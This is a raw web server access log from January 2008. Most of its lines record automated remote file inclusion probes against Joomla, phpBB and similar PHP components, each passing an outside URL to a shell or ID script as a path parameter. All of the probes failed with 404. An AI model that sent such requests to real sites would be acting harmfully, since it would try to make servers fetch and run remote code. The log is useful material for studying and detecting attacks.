80.70.113.10 - - [25/Jan/2008:04:30:27 -0800] "GET /logs/access_071225.log//include/write.php?dir=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.246.41.127 - - [25/Jan/2008:04:32:39 -0800] "GET /logs/access_071224.log/index1.php?pg=http://www.cantorque.ca/themes/cantorque/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.41.127 - - [25/Jan/2008:04:32:39 -0800] "GET /index1.php?pg=http://www.cantorque.ca/themes/cantorque/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.41.127 - - [25/Jan/2008:04:32:39 -0800] "GET /logs/index1.php?pg=http://www.cantorque.ca/themes/cantorque/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:04:33:26 -0800] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:04:33:26 -0800] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:04:33:26 -0800] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:04:33:26 -0800] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
67.195.44.94 - - [25/Jan/2008:04:34:22 -0800] "GET /logs/access.log HTTP/1.0" 200 51756 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [25/Jan/2008:04:34:31 -0800] "GET /funny/?S=A HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:04:35:27 -0800] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:04:35:27 -0800] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:04:35:27 -0800] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:04:35:28 -0800] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
66.33.17.180 - - [25/Jan/2008:04:37:13 -0800] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.33.17.180 - - [25/Jan/2008:04:37:13 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.33.17.180 - - [25/Jan/2008:04:37:14 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:38:54 -0800] "GET /logs/access.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:38:55 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:38:56 -0800] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
202.123.27.136 - - [25/Jan/2008:04:40:21 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.27.136 - - [25/Jan/2008:04:40:21 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.27.136 - - [25/Jan/2008:04:40:22 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.27.136 - - [25/Jan/2008:04:40:23 -0800] "GET /logs/access_071230.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.71 - - [25/Jan/2008:04:40:23 -0800] "GET /logs/access.log HTTP/1.0" 200 55429 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:40:40 -0800] "GET /logs/access_071105.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
203.194.134.166 - - [25/Jan/2008:04:41:55 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.194.134.166 - - [25/Jan/2008:04:41:55 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.194.134.166 - - [25/Jan/2008:04:41:56 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:04:44:33 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:04:44:33 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:04:44:34 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:04:44:34 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:04:44:41 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:04:44:41 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:04:44:42 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:04:44:42 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:04:44:43 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:04:44:43 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:04:44:43 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:04:44:43 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
203.194.134.166 - - [25/Jan/2008:04:45:12 -0800] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.28.74 - - [25/Jan/2008:04:45:28 -0800] "GET /megumi/earrings/?M=A HTTP/1.0" 200 2065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.239.177.121 - - [25/Jan/2008:04:46:33 -0800] "GET /modules/coppermine/include/init.inc.php?CPG_M_DIR=%20http://www.modem56.info/modules/postguestbook/styles/internal/header.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
213.239.177.121 - - [25/Jan/2008:04:46:33 -0800] "GET /logs/modules/coppermine/include/init.inc.php?CPG_M_DIR=%20http://www.modem56.info/modules/postguestbook/styles/internal/header.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:04:47:23 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:04:47:24 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:04:47:25 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:04:47:29 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:04:48:24 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:04:48:24 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:04:48:24 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:04:48:24 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:48:55 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:48:55 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:48:55 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:48:55 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
209.126.144.75 - - [25/Jan/2008:04:49:13 -0800] "GET /logs/access_080106.log//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.126.144.75 - - [25/Jan/2008:04:49:13 -0800] "GET //com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.126.144.75 - - [25/Jan/2008:04:49:13 -0800] "GET /logs//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.194.134.166 - - [25/Jan/2008:04:49:37 -0800] "GET /logs/access_071228.log//components/com_simpleboard/image_upload.php?sbp=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.194.134.166 - - [25/Jan/2008:04:49:37 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.194.134.166 - - [25/Jan/2008:04:49:38 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.138.210 - - [25/Jan/2008:04:50:34 -0800] "GET /logs/tarnet/addons/slideshow_full.php?album_name=http://www.bsn.thecomit.com/classes/adodbt/private.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
203.194.134.166 - - [25/Jan/2008:04:50:35 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.194.134.166 - - [25/Jan/2008:04:50:35 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.194.134.166 - - [25/Jan/2008:04:50:35 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.138.210 - - [25/Jan/2008:04:50:36 -0800] "GET /tarnet/addons/slideshow_full.php?album_name=http://www.bsn.thecomit.com/classes/adodbt/private.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
209.196.109.49 - - [25/Jan/2008:04:51:37 -0800] "GET /funny/ HTTP/1.1" 200 808 "http://www.google.com/search?q=index+of+funny&hl=en&safe=off&client=firefox-a&rls=org.mozilla:en-US:official&start=20&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
209.196.109.49 - - [25/Jan/2008:04:51:37 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
209.196.109.49 - - [25/Jan/2008:04:51:42 -0800] "GET / HTTP/1.1" 200 2962 "http://www.dmulk.com/funny/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
209.196.109.49 - - [25/Jan/2008:04:51:59 -0800] "GET /mobileoffice/ HTTP/1.1" 200 5024 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
209.196.109.49 - - [25/Jan/2008:04:52:05 -0800] "GET /mobileoffice/2c_3.jpg HTTP/1.1" 200 69236 "http://www.dmulk.com/mobileoffice/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
203.194.134.166 - - [25/Jan/2008:04:53:06 -0800] "GET /logs/access_071220.log//components/com_simpleboard/image_upload.php?sbp=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.60.207.171 - - [25/Jan/2008:04:53:10 -0800] "GET //com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.126.144.75 - - [25/Jan/2008:04:53:16 -0800] "GET /logs/access_080101.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.126.144.75 - - [25/Jan/2008:04:53:16 -0800] "GET //administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.126.144.75 - - [25/Jan/2008:04:53:16 -0800] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:04:53:39 -0800] "GET /logs/access.log//cms/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:56:14 -0800] "GET /logs/access_071224.log/modules/Neos_Chronos/header.php?base_folder=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:56:14 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:56:15 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
209.126.144.75 - - [25/Jan/2008:04:56:34 -0800] "GET /logs/access_080106.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.212.80.130 - - [25/Jan/2008:04:57:15 -0800] "GET /logs/access_071224.log/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.212.80.130 - - [25/Jan/2008:04:57:16 -0800] "GET /modules/coppermine/include/init.inc.php?CPG_M_DIR=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.212.80.130 - - [25/Jan/2008:04:57:16 -0800] "GET /logs/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:57:30 -0800] "GET /logs/access_071222.log/components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:57:31 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:57:32 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
69.50.243.66 - - [25/Jan/2008:04:57:34 -0800] "GET /logs/access_071225.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.243.66 - - [25/Jan/2008:04:57:34 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.243.66 - - [25/Jan/2008:04:57:34 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.212.80.130 - - [25/Jan/2008:04:58:27 -0800] "GET /logs/access_071230.log/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.50.243.66 - - [25/Jan/2008:05:00:30 -0800] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.27.136 - - [25/Jan/2008:05:02:59 -0800] "GET /logs/access.log//cms/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
150.161.5.91 - - [25/Jan/2008:05:03:06 -0800] "GET /logs/access_071230.log//bottom.php?style=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.161.5.91 - - [25/Jan/2008:05:03:06 -0800] "GET //bottom.php?style=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.161.5.91 - - [25/Jan/2008:05:03:07 -0800] "GET /logs//bottom.php?style=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.161.5.91 - - [25/Jan/2008:05:03:17 -0800] "GET /logs/access_071225.log/index.php?from_market=Y&pageurl=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.161.5.91 - - [25/Jan/2008:05:03:18 -0800] "GET /index.php?from_market=Y&pageurl=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.161.5.91 - - [25/Jan/2008:05:03:18 -0800] "GET /logs/index.php?from_market=Y&pageurl=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.216.107 - - [25/Jan/2008:05:03:51 -0800] "GET /logs/access_071228.log HTTP/1.0" 200 398582 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:05:04:12 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:05:04:18 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:05:04:18 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:05:04:23 -0800] "GET /logs/access_071230.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
